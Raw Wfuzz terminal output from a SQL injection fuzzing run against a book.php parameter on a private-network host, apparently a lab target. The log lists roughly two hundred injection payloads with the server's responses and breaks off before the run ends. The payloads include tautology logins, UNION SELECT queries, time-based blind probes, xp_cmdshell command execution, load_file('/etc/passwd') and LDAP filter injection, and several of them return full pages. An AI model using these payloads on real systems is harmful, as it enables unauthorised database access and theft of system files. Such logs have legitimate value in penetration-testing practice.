********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.78.83/ebook/book.php?bookisbn=FUZZ
Total requests: 267

=====================================================================
ID        [0m   Response[0m   Lines [0m   Word    [0m   Chars    [0m   Payload                                                                                                                                                                                                                                                    [0m
=====================================================================

000000001:[0m   200     [0m   0 L   [0m   32 W    [0m   174 Ch   [0m   ")%20or%20('x'='x"                                                                                                                                                                                                                                         [0m
000000027:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                         [0m
[0K[1A[0K000000030:[0m   200     [0m   0 L   [0m   32 W    [0m   178 Ch   [0m   "1 waitfor delay '0:0:10'--"                                                                                                                                                                                                                               [0m
000000025:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "(||6)"                                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000007:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1) or pg_sleep(__TIME__)--"                                                                                                                                                                                                                               [0m
[0K[1A[0K000000029:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 0=0 --"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000026:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ""a"" or 3=3--""                                                                                                                                                                                                                                           [0m
[0K[1A[0K000000003:[0m   200     [0m   0 L   [0m   37 W    [0m   193 Ch   [0m   "; execute immediate 'sel' || 'ect us' || 'er'"                                                                                                                                                                                                            [0m
000000028:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "# from wapiti"                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000015:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @q nvarchar (200) 0x730065006c00650063 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000016:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 0=0 #"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000024:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "asc"                                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000021:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "*|"                                                                                                                                                                                                                                                       [0m
[0K[1A[0K000000017:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "insert"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000020:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "; exec xp_regread"                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000023:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1)) or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                       [0m
[0K[1A[0K000000022:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "@var select @var as var into temp end --"                                                                                                                                                                                                                 [0m
[0K[1A[0K000000019:[0m   200     [0m   0 L   [0m   32 W    [0m   174 Ch   [0m   ") or ('a'='a"                                                                                                                                                                                                                                             [0m
000000018:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1) or sleep(__TIME__)#"                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000014:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "*(|(objectclass=*))"                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000006:[0m   200     [0m   0 L   [0m   32 W    [0m   184 Ch   [0m   "";waitfor delay '0:0:__TIME__'--"                                                                                                                                                                                                                         [0m
000000012:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or sleep(__TIME__)#"                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000010:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "delete"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000009:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ""hi"") or (""a""=""a""                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000013:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "pg_sleep(__TIME__)--"                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000008:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "||(elt(-3+5,bin(15),ord(10),hex(char(45))))"                                                                                                                                                                                                              [0m
[0K[1A[0K000000011:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "like"                                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000005:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "update"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000002:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%20or%201=1"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000004:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                              [0m
[0K[1A[0K000000048:[0m   200     [0m   0 L   [0m   34 W    [0m   193 Ch   [0m   "a' waitfor delay '0:0:10'--"                                                                                                                                                                                                                              [0m
000000044:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "PRINT"                                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000042:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 2 > 1"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000033:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or a = a"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000045:[0m   200     [0m   0 L   [0m   34 W    [0m   181 Ch   [0m   "hi') or ('a'='a"                                                                                                                                                                                                                                          [0m
000000031:[0m   200     [0m   0 L   [0m   32 W    [0m   174 Ch   [0m   "or 'a'='a"                                                                                                                                                                                                                                                [0m
000000046:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 3=3"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000037:[0m   200     [0m   97 L  [0m   377 W   [0m   4632 Ch  [0m   "hi' or 'a'='a"                                                                                                                                                                                                                                            [0m
000000043:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "")) or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                       [0m
[0K[1A[0K000000047:[0m   200     [0m   0 L   [0m   32 W    [0m   184 Ch   [0m   "));waitfor delay '0:0:__TIME__'--"                                                                                                                                                                                                                        [0m
000000039:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "21 %"                                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000041:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000040:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "limit"                                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000036:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ")) or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                        [0m
[0K[1A[0K000000038:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "0"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000034:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "UNION ALL SELECT"                                                                                                                                                                                                                                         [0m
[0K[1A[0K000000035:[0m   200     [0m   0 L   [0m   34 W    [0m   192 Ch   [0m   ") or sleep(__TIME__)='"                                                                                                                                                                                                                                   [0m
000000049:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1;(load_file(char(47,101,116,99,47,112,97,115, ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000051:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1 or sleep(__TIME__)#"                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000032:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "hi or 1=1 --""                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000055:[0m   200     [0m   0 L   [0m   34 W    [0m   184 Ch   [0m   "or 'text' = n'text'"                                                                                                                                                                                                                                      [0m
000000063:[0m   200     [0m   0 L   [0m   32 W    [0m   171 Ch   [0m   "x' AND email IS NULL; --"                                                                                                                                                                                                                                 [0m
000000079:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ") union select * from information_schema.tables;"                                                                                                                                                                                                         [0m
[0K[1A[0K000000078:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or a=a"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000077:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%2A%28%7C%28objectclass%3D%2A%29%29"                                                                                                                                                                                                                      [0m
[0K[1A[0K000000080:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "PRINT @@variable"                                                                                                                                                                                                                                         [0m
[0K[1A[0K000000073:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "sqlvuln"                                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000076:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or%201=1 --"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000074:[0m   200     [0m   0 L   [0m   32 W    [0m   184 Ch   [0m   ""));waitfor delay '0:0:__TIME__'--"                                                                                                                                                                                                                       [0m
000000075:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "||6"                                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000072:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "tz_offset"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000070:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "\x27UNION SELECT"                                                                                                                                                                                                                                         [0m
[0K[1A[0K000000068:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "truncate"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000069:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1) or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                        [0m
[0K[1A[0K000000067:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "//"                                                                                                                                                                                                                                                       [0m
[0K[1A[0K000000071:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @s varchar(200) select @s = 0x77616974 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000065:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "admin' or '"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000066:[0m   200     [0m   0 L   [0m   34 W    [0m   189 Ch   [0m   "or 'unusual' = 'unusual'"                                                                                                                                                                                                                                 [0m
000000062:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or pg_sleep(__TIME__)--"                                                                                                                                                                                                                                [0m
[0K[1A[0K000000064:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "&"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000054:[0m   200     [0m   0 L   [0m   32 W    [0m   180 Ch   [0m   "or '7659'='7659"                                                                                                                                                                                                                                          [0m
000000061:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "3.10E+17"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000058:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @s varchar (200) select @s = 0x73656c6 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000060:[0m   200     [0m   0 L   [0m   33 W    [0m   189 Ch   [0m   "; exec master..xp_cmdshell 'ping 172.10.1.255'--"                                                                                                                                                                                                         [0m
000000057:[0m   200     [0m   0 L   [0m   35 W    [0m   184 Ch   [0m   "or 1=1 or ''='"                                                                                                                                                                                                                                           [0m
000000059:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "exec xp"                                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000056:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "--"                                                                                                                                                                                                                                                       [0m
[0K[1A[0K000000053:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "and 1 in (select var from temp)--"                                                                                                                                                                                                                        [0m
[0K[1A[0K000000050:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or%201=1"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000052:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000081:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or isNULL(1/0) /*"                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000097:[0m   200     [0m   0 L   [0m   36 W    [0m   217 Ch   [0m   "t'exec master..xp_cmdshell 'nslookup www.googl ..."                                                                                                                                                                                                       [0m
000000087:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "and 1=( if((load_file(char(110,46,101,120,11 ..."                                                                                                                                                                                                         [0m
[0K[1A[0K000000095:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "(sqlattempt2)"                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000098:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%20$(sleep%2050)"                                                                                                                                                                                                                                         [0m
[0K[1A[0K000000083:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or "a"="a"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000096:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or (EXISTS)"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000092:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "/**/or/**/1/**/=/**/1"                                                                                                                                                                                                                                    [0m
[0K[1A[0K000000094:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ",@variable"                                                                                                                                                                                                                                               [0m
[0K[1A[0K000000093:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "union all select @@version--"                                                                                                                                                                                                                             [0m
[0K[1A[0K000000091:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1)) or pg_sleep(__TIME__)--"                                                                                                                                                                                                                              [0m
[0K[1A[0K000000090:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "as"                                                                                                                                                                                                                                                       [0m
[0K[1A[0K000000085:[0m   200     [0m   0 L   [0m   32 W    [0m   171 Ch   [0m   "x' AND members.email IS NULL; --"                                                                                                                                                                                                                         [0m
000000089:[0m   200     [0m   0 L   [0m   33 W    [0m   178 Ch   [0m   "%20'sleep%2050'"                                                                                                                                                                                                                                          [0m
000000086:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1--"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000088:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "0x770061006900740066006F0072002000640065006C00 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000101:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "||UTL_HTTP.REQUEST"                                                                                                                                                                                                                                       [0m
[0K[1A[0K000000099:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1 or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                         [0m
[0K[1A[0K000000082:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "26 %"                                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000084:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "(sqlvuln)"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000105:[0m   200     [0m   0 L   [0m   34 W    [0m   194 Ch   [0m   "or 'whatever' in ('whatever')"                                                                                                                                                                                                                            [0m
000000113:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "select * from information_schema.tables--"                                                                                                                                                                                                                [0m
[0K[1A[0K000000115:[0m   200     [0m   97 L  [0m   379 W   [0m   4633 Ch  [0m   "a' or 'a' = 'a"                                                                                                                                                                                                                                           [0m
000000114:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "a' or 1=1--"                                                                                                                                                                                                                                              [0m
000000112:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or sleep(__TIME__)#"                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000111:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "union select"                                                                                                                                                                                                                                             [0m
[0K[1A[0K000000109:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "exec(@s)"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000110:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ") or pg_sleep(__TIME__)--"                                                                                                                                                                                                                                [0m
[0K[1A[0K000000108:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "0x77616974666F722064656C61792027303A303A313027 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000107:[0m   200     [0m   0 L   [0m   32 W    [0m   178 Ch   [0m   "union select 1,load_file('/etc/passwd'),1,1,1;"                                                                                                                                                                                                           [0m
000000103:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "hi' or 'x'='x';"                                                                                                                                                                                                                                          [0m
000000104:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "") or sleep(__TIME__)=""                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000106:[0m   200     [0m   0 L   [0m   32 W    [0m   172 Ch   [0m   "; begin declare @var varchar(8000) set @var=' ..."                                                                                                                                                                                                        [0m
000000100:[0m   200     [0m   0 L   [0m   34 W    [0m   178 Ch   [0m   "%20or%20''='"                                                                                                                                                                                                                                             [0m
000000116:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @s varchar(22) select @s ="                                                                                                                                                                                                                       [0m
[0K[1A[0K000000102:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or pg_sleep(__TIME__)--"                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000146:[0m   200     [0m   0 L   [0m   33 W    [0m   177 Ch   [0m   "or ''='"                                                                                                                                                                                                                                                  [0m
000000118:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or a=a--"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000122:[0m   200     [0m   0 L   [0m   34 W    [0m   178 Ch   [0m   "or 1 --'"                                                                                                                                                                                                                                                 [0m
000000130:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "order by"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000149:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "select"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000148:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%20or%20x=x"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000145:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "group by userid having 1=1--"                                                                                                                                                                                                                             [0m
[0K[1A[0K000000144:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "-- &password="                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000143:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "a' or 3=3--"                                                                                                                                                                                                                                              [0m
000000147:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "; exec master..xp_cmdshell"                                                                                                                                                                                                                               [0m
[0K[1A[0K000000142:[0m   200     [0m   0 L   [0m   32 W    [0m   184 Ch   [0m   "");waitfor delay '0:0:__TIME__'--"                                                                                                                                                                                                                        [0m
000000140:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "(select top 1"                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000141:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                           [0m
[0K[1A[0K000000139:[0m   200     [0m   0 L   [0m   34 W    [0m   180 Ch   [0m   "or 'text' > 't'"                                                                                                                                                                                                                                          [0m
000000138:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "*/*"                                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000137:[0m   200     [0m   0 L   [0m   32 W    [0m   171 Ch   [0m   "x' AND userid IS NULL; --"                                                                                                                                                                                                                                [0m
000000136:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or 1=1--"                                                                                                                                                                                                                                               [0m
[0K[1A[0K000000131:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "bfilename"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000134:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or username like char(37);"                                                                                                                                                                                                                               [0m
[0K[1A[0K000000129:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "char%4039%41%2b%40SELECT"                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000133:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ") or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                         [0m
[0K[1A[0K000000128:[0m   200     [0m   0 L   [0m   13 W    [0m   127 Ch   [0m   "... or 1=1 --"                                                                                                                                                                                                                                            [0m
000000135:[0m   200     [0m   0 L   [0m   32 W    [0m   184 Ch   [0m   ";waitfor delay '0:0:__TIME__'--"                                                                                                                                                                                                                          [0m
000000132:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "having 1=1--"                                                                                                                                                                                                                                             [0m
[0K[1A[0K000000127:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @s varchar (8000) select @s = 0x73656c ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000126:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or isNULL(1/0) /*"                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000125:[0m   200     [0m   0 L   [0m   32 W    [0m   172 Ch   [0m   "a'"                                                                                                                                                                                                                                                       [0m
000000123:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 0=0 #""                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000119:[0m   200     [0m   0 L   [0m   32 W    [0m   174 Ch   [0m   "or '1'='1"                                                                                                                                                                                                                                                [0m
000000120:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "|"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000152:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "hi' or 1=1 --"                                                                                                                                                                                                                                            [0m
000000124:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "having"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000150:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "")) or sleep(__TIME__)=""                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000121:[0m   200     [0m   0 L   [0m   33 W    [0m   190 Ch   [0m   "or sleep(__TIME__)='"                                                                                                                                                                                                                                     [0m
000000156:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "exec sp"                                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000117:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 2 between 1 and 3"                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000164:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "replace"                                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000165:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "%27%20or%201=1"                                                                                                                                                                                                                                           [0m
000000159:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ".. or 1=1 --"                                                                                                                                                                                                                                             [0m
[0K[1A[0K000000168:[0m   200     [0m   0 L   [0m   32 W    [0m   171 Ch   [0m   "x' AND 1=(SELECT COUNT(*) FROM tabname); --"                                                                                                                                                                                                              [0m
000000162:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ") or (a=a"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000163:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "uni/**/on sel/**/ect"                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000161:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "0 or 1=1"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000158:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "("                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000167:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%7C"                                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000160:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1 or pg_sleep(__TIME__)--"                                                                                                                                                                                                                                [0m
[0K[1A[0K000000166:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ")) or pg_sleep(__TIME__)--"                                                                                                                                                                                                                               [0m
[0K[1A[0K000000155:[0m   200     [0m   0 L   [0m   35 W    [0m   196 Ch   [0m   "or 'something' = 'some'+'thing'"                                                                                                                                                                                                                          [0m
000000171:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @q nvarchar (200) select @q = 0x770061 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000185:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "hi or a=a"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000154:[0m   200     [0m   0 L   [0m   32 W    [0m   174 Ch   [0m   "%20or%20'x'='x"                                                                                                                                                                                                                                           [0m
000000153:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "") or pg_sleep(__TIME__)--"                                                                                                                                                                                                                               [0m
[0K[1A[0K000000169:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "&apos;%20OR"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000151:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "0x730065006c0065006300740020004000400076006500 ..."                                                                                                                                                                                                       [0m
[0K[1A[0K000000183:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 0=0 #"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000157:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "29 %"                                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000175:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "/"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000182:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1)) or sleep(__TIME__)#"                                                                                                                                                                                                                                  [0m
[0K[1A[0K000000174:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "23 OR 1=1"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000173:[0m   200     [0m   0 L   [0m   35 W    [0m   192 Ch   [0m   "; exec ('sel' + 'ect us' + 'er')"                                                                                                                                                                                                                         [0m
000000184:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "select name from syscolumns where id = (sele ..."                                                                                                                                                                                                         [0m
[0K[1A[0K000000179:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "desc"                                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000178:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 0=0 --"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000176:[0m   200     [0m   97 L  [0m   377 W   [0m   4638 Ch  [0m   "anything' OR 'x'='x"                                                                                                                                                                                                                                      [0m
000000180:[0m   200     [0m   0 L   [0m   32 W    [0m   170 Ch   [0m   "||'6"                                                                                                                                                                                                                                                     [0m
000000181:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ")"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000177:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @q nvarchar (4000) select @q ="                                                                                                                                                                                                                   [0m
[0K[1A[0K000000170:[0m   200     [0m   0 L   [0m   32 W    [0m   175 Ch   [0m   "; or '1'='1'"                                                                                                                                                                                                                                             [0m
000000188:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "distinct"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000186:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "*(|(mail=*))"                                                                                                                                                                                                                                             [0m
[0K[1A[0K000000200:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "union select * from users where login = char ..."                                                                                                                                                                                                         [0m
[0K[1A[0K000000192:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "UNION SELECT"                                                                                                                                                                                                                                             [0m
[0K[1A[0K000000172:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1 or 1=1"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000204:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "@variable"                                                                                                                                                                                                                                                [0m
